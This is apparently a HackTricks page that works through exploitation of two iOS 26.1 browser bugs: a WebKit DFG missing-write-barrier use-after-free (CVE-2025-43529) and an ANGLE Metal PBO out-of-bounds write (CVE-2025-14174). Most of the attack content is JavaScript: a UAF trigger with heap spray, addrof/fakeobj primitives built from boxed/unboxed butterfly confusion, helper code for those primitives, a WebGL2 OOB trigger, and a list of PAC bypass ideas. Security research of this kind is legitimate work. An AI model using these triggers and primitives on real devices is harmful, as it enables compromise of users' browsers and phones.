WebKit DFG Store-Barrier UAF + ANGLE PBO OOB (iOS 26.1)

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Overview

  • DFG store-barrier bug (CVE-2025-43529): in DFGStoreBarrierInsertionPhase.cpp, a Phi node marked as escaped while its Upsilon inputs are not causes the phase to omit the write barrier on the object stores that follow. Under GC pressure this lets JSC free objects that are still reachable → use-after-free.
  • Exploit goal: force a Date object to materialize a butterfly (e.g., a[0] = 1.1) so that the butterfly is the thing that gets freed, then have it reclaimed as array element storage, giving a boxed/unboxed confusion → addrof/fakeobj primitives.
  • ANGLE Metal PBO bug (CVE-2025-14174): the Metal backend sizes the PBO staging buffer from UNPACK_IMAGE_HEIGHT instead of the real texture height. Setting a small unpack height and then issuing a large texImage2D produces a staging-buffer OOB write (~240KB in the PoC below).
  • PAC blockers on arm64e (iOS 26.1): TypedArray m_vector and the JSArray butterfly pointer are PAC-signed; forging fake objects with attacker-chosen pointers crashes with EXC_BAD_ACCESS/EXC_ARM_PAC. Only reuse of already-signed butterflies (boxed/unboxed reinterpretation) works.

Triggering the DFG missing barrier → UAF

// Harness globals (assumed; the page does not show their setup): an old-space
// array that keeps A reachable, a slot index into it, and a list for the spray.
const arr = new Array(1024).fill(null);
let arr_index = 0;
const forGC = [];

// The bug is in a DFG phase, so this must run DFG-compiled: call it repeatedly,
// varying `flag`, so that the Phi/Upsilon shape below is actually produced.
function triggerUAF(flag, allocCount) {
  const A = {p0: 0x41414141, p1: 1.1, p2: 2.2};
  arr[arr_index] = A;                   // Tenure A in old space
  const a = new Date(1111); a[0] = 1.1; // Force Date butterfly (the freed target)

  // GC pressure
  for (let j = 0; j < allocCount; ++j) forGC.push(new ArrayBuffer(0x800000));

  const b = {p0: 0x42424242, p1: 1.1};
  let f = b; if (flag) f = 1.1;         // Phi escapes, Upsilon not escaped
  A.p1 = f;                             // Missing barrier state set up

  for (let i = 0; i < 1e6; ++i) {}      // GC race window
  b.p1 = a;                             // Store without barrier → frees `a`/butterfly
}

Key notes:

  • Keep A in old space so that the store interacts with the generational thresholds (an old-to-young store is exactly what needs a barrier).
  • Create an indexed Date so that its butterfly is the object that gets freed.
  • Spray ArrayBuffer(0x800000) to force a GC and widen the race window.
  • The Phi/Upsilon escape mismatch suppresses barrier insertion; b.p1 = a runs without a write barrier, so the GC reclaims a/its butterfly.

Butterfly reclaim → boxed/unboxed confusion

After the GC frees the Date's butterfly, spray arrays so that the freed slab is reused as element storage by two arrays with different element types (one boxed, holding JSValues, one unboxed, holding raw doubles):

// boxed_arr (ArrayWithContiguous) and unboxed_arr (ArrayWithDouble) share the
// reclaimed slab; ftoi/itof are the usual Float64Array/BigUint64Array
// reinterpretation helpers (their definitions are not shown on the page).
boxed_arr[0]   = obj;          // store as boxed pointer
const addr     = ftoi(unboxed_arr[0]); // read as float64 → addr leak
unboxed_arr[0] = itof(addr);   // write pointer bits as float
const fake     = boxed_arr[0]; // reinterpret as object → fakeobj
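As an added example (not code from the original page), here are the ftoi/itof helpers the snippet above relies on, plus a model of why the reinterpretation hands back raw pointer bits: an unboxed (double) array stores plain IEEE-754 doubles, while a boxed array stores JSValues, where a double is its bit pattern plus DoubleEncodeOffset and a cell pointer has its top 16 bits clear. The offset value (1 << 49, as in current JSC source) and the sample pointer 0x123456780 are assumptions of this example, not taken from the page. The "slab" is an ArrayBuffer viewed both ways; it models only the storage overlap and does not exercise the bug.

```javascript
// Added example: helpers and a storage model for the boxed/unboxed
// butterfly confusion. Not from the original page; the slab below is a
// model of the reclaimed element storage, not real JSC memory.

const conv = new ArrayBuffer(8);
const f64 = new Float64Array(conv);
const u64 = new BigUint64Array(conv);

// Raw IEEE-754 bits of a double, as a BigInt.
function ftoi(d) { f64[0] = d; return u64[0]; }
// Inverse: reinterpret 64 raw bits as a double.
function itof(bits) { u64[0] = BigInt.asUintN(64, bits); return f64[0]; }

// JSC NaN-boxing constants (assumption: current JSC, DoubleEncodeOffsetBit = 49).
const DOUBLE_ENCODE_OFFSET = 1n << 49n;
const NUMBER_TAG = 0xfffe000000000000n;

// How a double looks inside a *boxed* JSValue slot (bits + offset), and back.
function encodeDoubleJSValue(d) {
  return BigInt.asUintN(64, ftoi(d) + DOUBLE_ENCODE_OFFSET);
}
function decodeDoubleJSValue(bits) {
  return itof(bits - DOUBLE_ENCODE_OFFSET);
}

// Sanity check for a leaked value: a cell pointer is nonzero with the top
// 16 bits clear. A boxed double or int32 fails this, so a leak that fails it
// is a number that happened to sit in the slot, not an object address.
function isCellPointerBits(bits) {
  return bits !== 0n && (bits & NUMBER_TAG) === 0n;
}

// One reclaimed slab seen as boxed JSValue words and as unboxed doubles.
function makeSlab(slots) {
  const buf = new ArrayBuffer(slots * 8);
  return { boxed: new BigUint64Array(buf), unboxed: new Float64Array(buf) };
}

// addrof model: store the pointer through the boxed view (boxed_arr[0] = obj),
// read it back as a double through the unboxed view (ftoi(unboxed_arr[0])).
// Pointer bits with the top 16 bits clear are a (denormal) non-NaN double,
// so the round trip through Float64Array preserves every bit.
function modelAddrof(slab, ptrBits) {
  slab.boxed[0] = ptrBits;
  return ftoi(slab.unboxed[0]);
}

// fakeobj model: write pointer bits as a double (unboxed_arr[0] = itof(addr)),
// then read the same slot as a JSValue (boxed_arr[0]).
function modelFakeobj(slab, ptrBits) {
  slab.unboxed[0] = itof(ptrBits);
  return slab.boxed[0];
}

// What you see through the unboxed view when the boxed array held a double:
// the *encoded* bits, which must be decoded before they mean anything.
function modelBoxedDoubleLeak(slab, d) {
  slab.boxed[0] = encodeDoubleJSValue(d);
  return ftoi(slab.unboxed[0]);
}
```

In a real run the slab is the Date's freed butterfly, so the two views are two live JSArrays rather than two typed-array views; the bit-level behaviour of each line is the same. The isCellPointerBits check is worth keeping in the exploit: on arm64e a value that passes it is still only usable if it is an already-signed, legitimate pointer, as the PAC section below explains.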

Status on iOS 26.1 (arm64e):

  • Working: addrof, fakeobj, 20+ address leaks per run, inline-slot read/write (on known inline fields).
  • Not yet stable: generalized read64/write64 via inline-slot backings.

PAC constraints on arm64e (why fake objects crash)

  • TypedArray m_vector and the JSArray butterfly pointer are PAC-signed; forged pointers fail authentication and crash with EXC_BAD_ACCESS, or possibly EXC_ARM_PAC.
  • The confusion primitive works because it reuses legitimate, already-signed butterflies; injecting unsigned attacker pointers fails authentication.
  • Potential bypass ideas mentioned: JIT paths that skip authentication, gadgets that sign attacker-controlled pointers, or a pivot through the ANGLE OOB.

ANGLE Metal PBO under-allocation → OOB write

Use a small unpack height to shrink the staging buffer, then upload a large texture so that the copy runs past the end of it:

// WebGL2 context; the texImage2D overload whose last argument is an offset (0)
// reads from the bound PIXEL_UNPACK_BUFFER, i.e. the PBO path the bug lives in.
const gl = document.createElement('canvas').getContext('webgl2');
gl.bindTexture(gl.TEXTURE_2D, gl.createTexture());
gl.bindBuffer(gl.PIXEL_UNPACK_BUFFER, gl.createBuffer());
gl.bufferData(gl.PIXEL_UNPACK_BUFFER, 256 * 256 * 4, gl.STATIC_DRAW); // source pixels

gl.pixelStorei(gl.UNPACK_IMAGE_HEIGHT, 16);  // alloc height
// staging = 256 * 16 * 4 = 16KB
// actual  = 256 * 256 * 4 = 256KB → ~240KB OOB

gl.texImage2D(gl.TEXTURE_2D, 0, gl.DEPTH_COMPONENT32F,
              256, 256, 0, gl.DEPTH_COMPONENT, gl.FLOAT, 0);

Notes:

  • The bug is in TextureMtl.cpp: on the PBO path the staging buffer is sized from UNPACK_IMAGE_HEIGHT instead of the real texture height.
  • In the reference probe, the WebGL2 PBO trigger is wired up but has not yet been observed to fire reliably on iOS 26.1.

References
